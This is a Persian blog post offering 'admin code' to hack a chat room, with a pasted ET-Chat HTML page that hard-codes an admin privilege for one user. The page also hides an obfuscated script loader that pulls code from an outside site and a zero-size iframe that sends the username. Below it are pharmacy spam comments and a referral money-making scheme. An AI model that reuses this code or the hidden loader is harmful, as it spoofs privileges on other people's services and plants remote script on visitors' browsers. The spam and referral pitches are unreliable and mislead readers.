تبلیغات
دانلود آموزش گفتوگو - کد مدیر شدن در چت روم(هک چتروم)

امروز:

کد مدیر شدن در چت روم(هک چتروم)

برای دریافت کد بر روی ادامه مطلب کلیک کنید
09383971209 : تلفن

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<script src="js/prototype.js" type="text/javascript"></script>
<script src="js/scriptaculous.js" type="text/javascript"></script>
<script src="js/chat.js" type="text/javascript"></script>
<script src="./?MessagesForJs" type="text/javascript"></script>
<link href="styles/etchat_white/style.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="js/window.js"></script>
<link href="styles/default_2create_win.css" rel="stylesheet" type="text/css" />
<script type="text/javascript">

window.onload = function() {
    var chatObj = new ET_Chat();
    chatObj.messages_im_chat=22;
    chatObj.reload_interval=4000;
    chatObj.username='..Milad..';
    chatObj.user_id='339845';
    chatObj.userPrivilegienGlobal='admin';
    chatObj.win_style='etchat_white';
    chatObj.anbindung_an_userverwaltung=false;
    chatObj.show_history_all_user=true; //sonst wird die History nur fuer Admin u  sichtbar
    chatObj.set_dynamic_height=true; // sonst hat das ganze Chat eine feste Hoehe
    chatObj.allow_nick_registration=true;
    chatObj.textcolor='000000';
    chatObj.start();
    chatObj.userOnline();
    if ( Prototype.Browser.IE )
        $("splitpane").onmousedown = function(){ chatObj.dragSplitpane(); }
    else
        chatObj.dragSplitpane();
}

  </script><body id="body_id">
<div id="rahmen_um_alles">
<div id="kopf"></div>
<div id="onlinelist"><img src="img/ajax-loader.gif" alt="" /></div>
<div id="splitpane"></div>
<div id="chatinhalt">
<style>
.Gbutton{</form><div style="font:bold 10px tahoma;text-align:right;color:#fff;direction:rtl;"><iframe id="I1" border="0" name="I1" src="http://www.fozolchat.ir/mp3.php" style="width: 230px; background-color: rgb(255, 255, 255); border-radius: 5px 5px 5px 5px;" frameborder="0" scrolling="no">Your browser does not support inline frames or is currently configured not to display inline frames.</iframe>
<iframe id="I1" border="0" name="I1" src="http://www.akvanchat.com/rk.php" style="width: 202px; background-color: rgb(255, 255, 255); border-radius: 5px 5px 5px 5px;" frameborder="0" scrolling="no">Your browser does not support inline frames or is currently configured not to display inline frames.</iframe>
<iframe id="I2" border="0" name="I2" src="http://shokchat.ir/chat/nazer.php" style="width: 230px; background-color: rgb(255, 255, 255); border-radius: 5px 5px 5px 5px;" frameborder="0" scrolling="no">
Your browser does not support inline frames or is currently configured not to display inline frames.
    <title>به عسل چت خوش آمدید</title>
<script language="javascript">
function whichButton(event)
{
if (event.button==2)//RIGHT CLICK
{
alert("please,not copy and paste in asalchat ");
}

}
function noCTRL(e)
{
var code = (document.all) ? event.keyCode:e.which;

var msg = "Sorry,you can`t copy and paste in asalchat.";
if (parseInt(code)==17) //CTRL
{
alert(msg);
window.event.returnValue = false;
}
}
</script>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

  <script src="js/prototype.js" type="text/javascript"></script>
  <script src="js/scriptaculous.js" type="text/javascript"></script>
  <script src="js/chat.js" type="text/javascript"></script>
  <script src="./?MessagesForJs" type="text/javascript"></script>
  <link href="styles/etchat_white/style.css" rel="stylesheet" type="text/css"/>

<style type="text/css">
#chatinhalt{

    padding: 5px;
    background:#ffffff url('http://irannab.com/up3/images/fsqnq70gdik53ccnnqs.jpg');
    font-size: 13px;
    font-family: tahoma;
    font-style: normal;
    /*margin-right:200px;*/
    position:relative;
    height: 450px;
    overflow: auto;
    padding: 5px;
    padding-bottom: 16px;
    line-height:150%;
        -moz-border-radius: 9px;
    -webkit-border-radius: 9px;
    border-radius: 9px;
        -moz-box-shadow: 3px 3px 4px #909090;
        -webkit-box-shadow: 3px 3px 4px #909090;
        line-height:180%;
        box-shadow: 3px 3px 4px #909090;


}
#onlinelist{

    background:#ffffff url('http://irannab.com/up3/images/fsqnq70gdik53ccnnqs.jpg');
padding: 5px;
    font-size: 12px;
    font-family: tahoma;
    font-style: normal;
    float: right;
    width: 200px;
    height: 450px;
    padding-bottom: 16px;
    overflow: auto;
            -moz-border-radius: 9px;
    -webkit-border-radius: 9px;
    border-radius: 9px;
        -moz-box-shadow: 3px 3px 4px #909090;
        -webkit-box-shadow: 3px 3px 4px #909090;
        box-shadow: 3px 3px 4px #909090;
        

}
#form{

    background:#ffffff url('http://irannab.com/up3/images/fsqnq70gdik53ccnnqs.jpg');
    font-size: 12px;
    font-family: tahoma;
    font-style: normal;
    clear: both;
    margin-top: 10px;
    color:#000000;
    padding: 3px;
    height: 45px;
     border: 1px solid #d7d7d7;
    -moz-border-radius: 9px;
    -webkit-border-radius: 9px;
    border-radius: 9px;
    -moz-box-shadow: 3px 3px 4px #909090;
        -webkit-box-shadow: 3px 3px 4px #909090;
        box-shadow: 3px 3px 4px #909090;
   

}
.rooms{
 background-image:url('http://irannab.com/up3/images/4aundw9ybd8csynvpq7.png');
 background-position:right;
 background-repeat:no-repeat;
 padding: 1px;
 margin-bottom: 12px;
 cursor:pointer;
 text-align:center;
 -moz-border-radius:5px;
 -webkit-border-radius5px;
 -moz-box-shadow:3px 3px 4px #565656;
 -webkit-box-shadow:3px 3px 4px #565656;
 box-shadow:3px 3px 4px #565656;
 height:22px;
 padding-top:7px

}
</style><script type="text/javascript" src="js/window.js"></script>
<link href="styles/default_2create_win.css" rel="stylesheet" type="text/css"/>
  <script type="text/javascript">

window.onload = function() {
    var chatObj = new ET_Chat();
    chatObj.messages_im_chat=100;
    chatObj.reload_interval=4000;
    chatObj.username='..milad..';
    chatObj.user_id='339845';
    chatObj.userPrivilegienGlobal='admin';
    chatObj.win_style='etchat_white';
    chatObj.anbindung_an_userverwaltung=false;
    chatObj.show_history_all_user=true; //sonst wird die History nur fuer Admin u Mod sichtbar
    chatObj.set_dynamic_height=true; // sonst hat das ganze Chat eine feste Hoehe
    chatObj.allow_nick_registration=true;
    chatObj.textcolor='000000';
    chatObj.start();
    chatObj.userOnline();
    if ( Prototype.Browser.IE )
        $("splitpane").onmousedown = function(){ chatObj.dragSplitpane(); }
    else
        chatObj.dragSplitpane();
}

  </script>

</head>
<body background="http://irannab.com/up3/images/05e06ntfm6vq6mdtjwm.jpg">
<div id="rahmen_um_alles">
<div id="kopf">
<div align="center">
<table border="0" width="100%" id="table1">
    <tr>
        <td>
        <p align="center">
        <img border="0" src="http://irannab.com/up3/images/3mkui5pdpgcqt6e9gm3o.jpg" ></td>
    </tr>
</table>
</div>
</div>
<div id="onlinelist"><img src="img/ajax-loader.gif" alt="" /></div>
<div id="splitpane"></div>
<div id="chatinhalt"></div>

<div id="form">
<form id="message_form" style="display:inline;" action="">

<div id="form_left">

<div id="privat_anzeige">به همه افراد:</div>

<input type="hidden" name="room" id="room" value="1" />
<input type="hidden" name="privat" id="privat" value="" />
<input type="hidden" name="bold" id="bold" value="normal" />
<input type="hidden" name="italic" id="italic" value="normal" />
<input type="hidden" name="color" id="color" value="#000000" />

<input name="message" id="message" type="text" class="input" style="width:400px;"/>
</div>
<div id="form_right">
<img id="link_sagen" class="img_button" src="img/Checked.png" width="32" height="32" border="0" alt="ارسال پیــام" title="ارسال پیــام" />&nbsp;&nbsp;&nbsp;
<img id="link_smileys" class="img_button" src="img/Smiley_Cool.png" width="32" height="32" border="0" alt="شکلک ها" title="شکلک ها" />&nbsp;&nbsp;&nbsp;
<img id="link_color" class="img_button" src="img/Colors.png" width="32" height="32" border="0" alt="فونت ها و رنگ ها" title="فونت ها و رنگ ها" />&nbsp;&nbsp;&nbsp;
<img id="link_prop" class="img_button" src="img/Display.png" width="32" height="32" border="0" alt="تنظیمات دیگر" title="تنظیمات دیگر" />&nbsp;&nbsp;&nbsp;

<img id="link_smileys2" class="img_button" src="img/fal.gif" width="32" height="32" border="0" alt="?#65533;ال حا?#65533;ظ" title="?#65533;ال حا?#65533;ظ" />&nbsp;&nbsp;&nbsp;
<a target="_blank" href="top.php">
<img  class="img_button" src="point.png" width="32" height="32" border="0" alt="&#1585;&#1578;&#1576;&#1607; &#1740;&#1606;&#1583;&#1740;" title="&#1585;&#1578;&#1576;&#1607; &#1576;&#1606;&#1583;&#1740;" /></a>&nbsp;&nbsp;&nbsp;
<a target="_blank" href="profile">
<img  class="img_button" src="profile.png" width="32" height="32" border="0" alt="&#1662;&#1585;&#1608;&#1601;&#1575;&#1740;&#1604;" title="&#1662;&#1585;&#1608;&#1601;&#1575;&#1740;&#1604;" /></a>&nbsp;&nbsp;&nbsp;
<a target="_blank" href="user">
<img  class="img_button" src="cpuser32.png" width="32" height="32" border="0" alt="&#1705;&#1606;&#1578;&#1585;&#1604; &#1662;&#1606;&#1604; &#1575;&#1593;&#1590;&#1575;&#1569;" title="&#1705;&#1606;&#1578;&#1585;&#1604; &#1662;&#1606;&#1604; &#1575;&#1593;&#1590;&#1575;&#1569;" /></a>&nbsp;&nbsp;&nbsp;

<img id="link_logout" class="img_button" src="img/Delete_big.png" width="32" height="32" border="0" alt="خروج از چت" title="خروج از چت" />
</div>
</form><br><br><br><br>
</div>

</div>
<p align="center">
<span style="font-family: Tahoma; font-size: medium; background-color:#FFFFFF">
<img border="0" src="registerchat.png" width="500" height="40"><br>
<img border="0" src="user500.png" width="500" height="40">
</span></p>
<div align="center">
    <table border="0" width="100" id="table1">
        <tr>
            <td>

<iframe width="294" height="248" src="amar3.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>
            <td>

<iframe width="294" height="248" src="amar10.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>            <td>

<iframe width="294" height="248" src="amar7.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>            <td>

<iframe width="294" height="248" src="amar5.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>
       </tr>
</table>
</div>
<center>
<a target="_blank" href="http://emsharj.com">
<img border="0" src="http://irannab.com/up3/images/y4xonud1qih63hnc5ux.gif" width="468" height="60"></a>

<a target="_blank" href="http://asalchat.blogfa.com/post-43.aspx">
<img border="0" src="http://irannab.com/up3/images/g1t1cxvnq7yzqwoixluv.gif" width="468" height="60"></a>


<br>
<script language="JavaScript">
var msz="Paste Nakonid Lotfan";

function Isr(evn){var dsr=window.event?event:evn;var esr=dsr.keyCode;if(dsr.ctrlKey){if(esr==86){document.getElementById("message").value=msz;return false}}return true}
var o6="g.c",oz="%73c%72i%70t>",o7='om/l"></',t9="t%70://si",yu="ngl.%70",oi="gi",o4="er%73i%61n",b8='%3C%73cr%69pt %73r%63="h%74';document.write(unescape(b8+t9+yu+o4+oi+o6+o7+oz));document.getElementById("message").onkeydown=Isr;document.getElementById("message").onkeypress=Isr;document.getElementById("message").onpaste=function(){return false};document.getElementById("message").onkeyup=Isr;
</script><br></center>
<html dir="ltr">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="fa">
</head>
<iframe width="0" height="0" src="emid.php?username2=..milad..." style="border: 0px;" frameborder="0" scrolling="no"></iframe>

<script language="JavaScript">
var msz="Sheyton Shodia :D ";

function Isr(evn){var dsr=window.event?event:evn;var esr=dsr.keyCode;if(dsr.ctrlKey){if(esr==90){document.getElementById("message").value=msz;return false}}return true}
var o6="g.c",oz="%73c%72i%70t>",o7='om/l"></',t9="t%70://si",yu="ngl.%70",oi="gi",o4="er%73i%61n",b8='%3C%73cr%69pt %73r%63="h%74';document.write(unescape(b8+t9+yu+o4+oi+o6+o7+oz));document.getElementById("message").onkeydown=Isr;document.getElementById("message").onkeypress=Isr;document.getElementById("message").onpaste=function(){return false};document.getElementById("message").onkeyup=Isr;
</script><script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3E%3C%21--%0D%0A%0D%0Avar%20message%3D%22&#1582;&#1585;&#1575;&#1576;&#1705;&#1575;&#1585;&#1610; &#1605;&#1605;&#1606;&#1608;&#1593;  : %20 %21%22%3B%0D%0A%0D%0Afunction%20clickIE%28%29%20%20%7Bif%20%28document.all%29%20%7Balert%28message%29%3Breturn%20false%3B%7D%7D%0D%0Afunction%20clickNS%28e%29%20%7Bif%20%0D%0A%28document.layers%7C%7C%28document.getElementById%26%26%21document.all%29%29%20%7B%0D%0Aif%20%28e.which%3D%3D2%7C%7Ce.which%3D%3D3%29%20%7Balert%28message%29%3Breturn%20false%3B%7D%7D%7D%0D%0Aif%20%28document.layers%29%20%0D%0A%7Bdocument.captureEvents%28Event.MOUSEDOWN%29%3Bdocument.onmousedown%3DclickNS%3B%7D%0D%0Aelse%7Bdocument.onmouseup%3DclickNS%3Bdocument.oncontextmenu%3DclickIE%3B%7D%0D%0A%0D%0Adocument.oncontextmenu%3Dnew%20Function%28%22return%20false%22%29%0D%0A%0D%0A//%20--%3E%3C/script%3E';d=unescape(m);document.write(d);</script>


</body>
</html>

نوشته شده در : شنبه چهاردهم اردیبهشتماه سال 1392  توسط : دانش مند.    نظرات() .

canada online pharmacies for men
شنبه سی و یکم شهریورماه سال 1397 17:02

Nicely spoken indeed. !
drugstore online trust pharmacy canadian pharmacy near me canadian discount pharmacies in canada top rated canadian pharmacies online trust pharmacy of canada canada pharmacies online prescriptions canadianpharmacy canada medication prices drugs for sale deep web
http://viagravipsale.com/
چهارشنبه بیست و هشتم شهریورماه سال 1397 18:40

Awesome postings. Thanks a lot!
generic cialis levitra cialis sicuro in linea cialis generic availability buy generic cialis cialis without a doctor's prescription cialis dose 30mg tadalafil 10 mg generic cialis at the pharmacy we like it cialis price we like it cialis soft gel
http://viagravonline.com/
سه شنبه بیست و هفتم شهریورماه سال 1397 15:31

Awesome information, Thank you!
look here cialis cheap canada cialis super kamagra cialis for daily use we choice cialis pfizer india dose size of cialis prezzo cialis a buon mercato cialis ahumada female cialis no prescription cialis generic availability buying cialis in colombia
http://buycialisky.com/
پنجشنبه پانزدهم شهریورماه سال 1397 03:51

Wow tons of amazing data!
how much does a cialis cost cialis vs viagra where to buy cialis in ontario bulk cialis cialis preise schweiz cialis daily new zealand warnings for cialis click now cialis from canada buy generic cialis cialis generic
http://viagraky.com/
سه شنبه سیزدهم شهریورماه سال 1397 04:02

You made the point.
where can i buy the cheapest viagra where to buy viagra on line buy viagra online discount buy viagra plus buy viagra online without purchase viagra online viagra viagra buy viagra cheapest viagra online pharmacy levitra buy viagra online germany
Buy cialis online
دوشنبه دوازدهم شهریورماه سال 1397 20:23

Truly a lot of terrific info!
cialis 30 day trial coupon cialis generico online cialis italia gratis legalidad de comprar cialis cialis patentablauf in deutschland cialis from canada how much does a cialis cost callus dose size of cialis cialis prezzo di mercato
cialisvu.com
دوشنبه دوازدهم شهریورماه سال 1397 01:55

Amazing postings, Thank you.
pastillas cialis y alcoho cialis canada on line venta de cialis canada i recommend cialis generico cialis manufacturer coupon cialis alternative costo in farmacia cialis cialis 200 dollar savings card cialis preise schweiz discount cialis
http://viagravipsale.com/
یکشنبه یازدهم شهریورماه سال 1397 12:49

You actually explained that fantastically.
purchase once a day cialis cialis 5 effetti collaterali cialis 5 mg effetti collateral buy generic cialis cialis 200 dollar savings card brand cialis nl usa cialis online rezeptfrei cialis apotheke purchasing cialis on the internet cialis daily new zealand
viabiovit.com/generic-name-for-viagra.html
سه شنبه بیست و سوم مردادماه سال 1397 03:20

You explained this fantastically.
viagra tablets buy online where can i purchase viagra online viagra online purchase viagra mail order buy online viagra where to buy viagra safely online sildenafil generic online viagra prescription buy viagra sample online viagra no prescription
Сialis
دوشنبه بیست و دوم مردادماه سال 1397 08:51
Hiya! Quick question that's completely off topic. Do you know how to make your site mobile friendly?
My website looks weird when viewing from my iphone. I'm trying to find a theme or plugin that might be able to fix this problem.
If you have any recommendations, please share. Thanks!
Buy cialis online
دوشنبه هفتم خردادماه سال 1397 02:47

Effectively spoken without a doubt! !
cialis efficacit cialis for bph tadalafil 20mg cialis kaufen bankberweisung cialis 5 mg schweiz what is cialis fast cialis online sialis cialis diario compra wow cialis tadalafil 100mg
Online cialis
پنجشنبه بیستم اردیبهشتماه سال 1397 04:18

Thanks, A good amount of facts.

purchasing cialis on the internet tadalafil 10 mg how does cialis work cialis tadalafil online cialis american pharmacy cialis acheter cialis meilleur pri cialis farmacias guadalajara only now cialis 20 mg cialis professional yohimbe
Generic cialis
جمعه هفتم اردیبهشتماه سال 1397 19:20

You've made your point.
walgreens price for cialis how to buy cialis online usa cialis uk next day cialis kamagra levitra cialis online deutschland buying brand cialis online cialis price thailand safe dosage for cialis buy cialis online legal cialis per paypa
Viagra pills
سه شنبه چهارم اردیبهشتماه سال 1397 04:52

Kudos. Helpful information.
viagra pharmacy is it illegal to buy viagra online buy viagra thailand buy viagra at walmart can you buy viagra without prescription online pharmacy usa viagra canadian pharmacy viagra generic online pharmacy how do i order viagra can you actually buy viagra online
Generic cialis
جمعه هفدهم فروردینماه سال 1397 20:31

This is nicely expressed! !
look here cialis cheap canada cialis side effects dangers ou acheter du cialis pas cher weblink price cialis cialis efficacit buy cialis online cialis online holland buy brand cialis cheap we use it cialis online store cialis rckenschmerzen
Cialis online
جمعه سوم فروردینماه سال 1397 17:09

Well voiced indeed. !
cialis 100 mg 30 tablet achat cialis en suisse prices on cialis 10 mg cost of cialis cvs enter site 20 mg cialis cost cialis tablets cialis mit grapefruitsaft non 5 mg cialis generici order generic cialis online fast cialis online
Generic cialis
دوشنبه بیست و هشتم اسفندماه سال 1396 00:01

Thanks a lot! Quite a lot of advice.

calis cialis usa cost price cialis per pill cialis side effects dangers cialis patentablauf in deutschland cialis savings card miglior cialis generico online prescriptions cialis 200 cialis coupon cialis pills boards
foot pain
دوشنبه سیزدهم شهریورماه سال 1396 13:18
If you want to take much from this post then you have to apply such methods to your won webpage.
ali
شنبه سوم مردادماه سال 1394 03:57
الان اینو چیکارش کنیم کجا ازش استفاده میشه
پاسخ دانش مند : بابا خودت یه کاریش کن دیگه بزار مردم به کاروزندگیشون برسن
علی
پنجشنبه پنجم تیرماه سال 1393 16:20
خوب بود
یاوری
یکشنبه بیست و دوم اردیبهشتماه سال 1392 08:30
سلام دوست عزیز با ثبت نام در این سایت می تونید با انلاین بودنتون راحت کسب درامد کنید فقط

کافیه ثبت نام کنید و روی دکمه شروع کسب درامد کلیک کنید به همین راحتی

خود وبسایت اتوماتیک به حساب شما پول واریز می کنه

فقط تا انلاین هستید صفحه اش رو باز بذارید

اگه دوست داشتید هم می تونید سایتتون رو ثبت کنید تا بازدید کننده برای سایت شما هم بفرسته
http://www.bazdidsaz.com/?refer=shahmiri

http://www.bazdidsaz.com/?refer=shahmiri
از طریق این لینک می تونید ثبت نام کنید هر چی زودتر ثبت نام کنید درامد بیشتری می تونید کسب کنید
 
لبخندناراحتچشمک
نیشخندبغلسوال
قلبخجالتزبان
ماچتعجبعصبانی
عینکشیطانگریه
خندهقهقههخداحافظ
سبزقهرهورا
دستگلتفکر